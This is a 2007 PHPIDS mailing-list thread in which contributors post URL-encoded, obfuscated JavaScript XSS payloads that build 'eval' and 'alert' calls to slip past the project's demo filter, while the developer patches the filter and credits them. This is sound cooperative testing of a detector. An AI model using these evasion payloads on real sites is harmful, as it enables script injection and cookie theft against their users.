> a ternary operator based injection:http://demo.php-ids.org/?test=%61%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F...

[xorrer]

Basic concept still works.

http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%6C%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%2B%27%65%76%61%27%2B%79%2E%79%3B%6E%3D%2E%31%5B%78%5D%3B%7B%7D%3B%3B%0D%0A%6F%3D%27%27%2B%7A%2B%22%61%6C%65%72%22%2B%7A%2B%22%74%28%78%29%22%3B%0D%0A%6E%28%6F%29%3B

Xorrer

On Sep 15, 10:19 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> Displays cookie and the string XSS (based on thornmakers and kishords
> work. thanks for the x='eval';n=0.[x] trick)
>

> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...

>
> Just some other stuff, again tested on Opera. Nothing special just
> something to mess up the page a little.
>

> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F...

[Mario Heiderich]

Nice one, xorrer! Your first ones i fixed on accident while working on thornmakers and kishors examples but the second one came unexpected ;) I did a slight modification on the converter to fix it. Thx!

2007/9/15, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

It's still possible

http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%65%76%61%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%2B%7B%7D%2B%7B%7D%2B%7B%7D%3B%0D%0A%7B%7D%3B%3B%0D%0A%7B%76%20%3D%28%30%29%3F%7A%3A%7A%7D%76%3D%7B%5F%24%3A%7A%2B%27%61%6C%65%72%27%2B%7A%7D%3B%0D%0A%7B%6B%20%3D%28%30%29%3F%7A%3A%7A%7D%6B%3D%7B%5F%24%24%3A%76%2E%5F%24%2B%27%74%28%78%29%27%2B%7A%7D%3B%0D%0A%78%3D%27%27%2B%79%2E%79%2B%27%6C%27%3B%7B%7D%3B%0D%0A%0D%0A%6E%3D%2E%31%5B%78%5D%3B%0D%0A%6E%28%6B%2E%5F%24%24%29

On Sep 15, 12:15 pm, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> Nice one, xorrer! Your first ones i fixed on accident while working on
> thornmakers and kishors examples but the second one came unexpected ;) I did
> a slight modification on the converter to fix it. Thx!
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > Basic concept still works.
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...

[Mario Heiderich]

Well - I think i got it this time ;)

@xorrer: I'd like to add you to the credits page - you want to be mentioned as xorrer or with your full name? You have a website you want to link your name to?

2007/9/15, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

@mario

Thanks. You can just list me up as xorrer, no webpage to link to.

On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Well - I think i got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...

[xorrer]

oh... and btw it still works. and this time i took the time to clean
up the vector a little

http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%65%76%61%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%3B%0D%0A%7B%76%20%3D%28%30%29%3F%7A%3A%7A%7D%76%3D%7B%5F%24%3A%27%61%6C%65%72%27%2B%7A%7D%3B%0D%0A%74%3D%7B%5F%24%24%24%3A%7A%2B%22%58%53%53%27%65%64%20%61%67%69%6E%22%2B%7A%7D%3B%0D%0A%6B%3D%7B%5F%24%24%3A%76%2E%5F%24%2B%27%74%28%74%2E%5F%24%24%24%29%27%2B%7A%7D%3B%0D%0A%78%3D%27%27%2B%79%2E%79%2B%27%6C%27%3B%0D%0A%6E%3D%2E%30%30%5B%78%5D%3B%0D%0A%6E%28%6B%2E%5F%24%24%29

[Mario Heiderich]

Argh - one second after the release ;)

2007/9/15, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

Still works along the same lines

http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%65%76%61%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%3B%0D%0A%0D%0A%76%3D%7B%5F%24%3A%7A%2B%27%61%6C%65%72%27%2B%7A%7D%3B%0D%0A%74%3D%7B%5F%24%24%24%3A%7A%2B%22%58%53%53%27%65%64%20%61%67%69%6E%20%66%72%6F%6D%20%6F%75%74%65%72%2A%73%70%61%63%65%2A%22%2B%7A%7D%3B%0D%0A%6B%3D%7B%5F%24%24%3A%76%2E%5F%24%2B%27%74%28%74%2E%5F%24%24%24%29%27%2B%7A%7D%3B%0D%0A%78%3D%27%27%2B%79%2E%79%2B%27%6C%27%3B%0D%0A%6E%3D%2E%31%20%5B%78%5D%3B%0D%0A%6E%28%6B%2E%5F%24%24%29

On Sep 15, 6:10 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Argh - one second after the release ;)
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:

>
>
>
>
>
>
>
> > oh... and btw it still works. and this time i took the time to clean
> > up the vector a little
>

> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...

[Mario Heiderich]

Well - this issue seems to be way harder to solve than i originally thought.

2007/9/15, xorrer <obhvsb...@gmail.com>:

php-ids.org

[thornmaker]

nice work xorrer!
here's another ternary one to add to the mix:
http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27%3A%30%3B%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%6C%27%2B%7A%3A%30%3B%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%65%76%61%27%2B%61%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%62%73%74%72%28%31%29%27%2B%7A%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%61%73%68%2E%73%75%27%2B%62%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%74%69%6F%6E%2E%68%27%2B%62%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%6C%6F%63%61%27%2B%62%3A%30%3B%63%3D%28%30%5B%61%5D%29%3B%64%3D%28%63%28%62%29%29%3B%63%28%64%29#alert%28%27%65%5E%28%69%2A%70%69%29%3D%2D%31%27%29

On Sep 15, 12:53 pm, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> Well - this issue seems to be way harder to solve than i originally thought.
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:

>
>
>
>
>
> > Still works along the same lines
>

> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...

> --
> _______________________
> php-ids.org

[xorrer]

Good stuff thornmaker.

Those ternary ones are though to prevent

I have a vector which fails by just one character. But I would like to
share it anyway.

http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B%61%2B%27%65%76%61%27%2C%5D%3B%63%3D%5B%62%2B%27%6C%27%2C%5D%3B%64%3D%5B%61%2B%27%61%6C%65%72%27%2C%5D%3B%65%3D%5B%64%2B%27%74%28%27%2C%5D%3B%0D%0A%66%3D%5B%65%2B%27%63%25%32%39%27%2C%5D%3B%0D%0A%24%3D%2E%31%5B%63%5D%3B%0D%0A%61%3D%24%3B%0D%0A%61%28%66%29

If you remove the closing bracket. It passes the IDS, but then the
eval won't work.

And with my setup there is no way to escape this regex _START_,.+=.+
(\?|,).*\)_END_ or am I wrong?

On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!

> here's another ternary one to add to the mix:http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...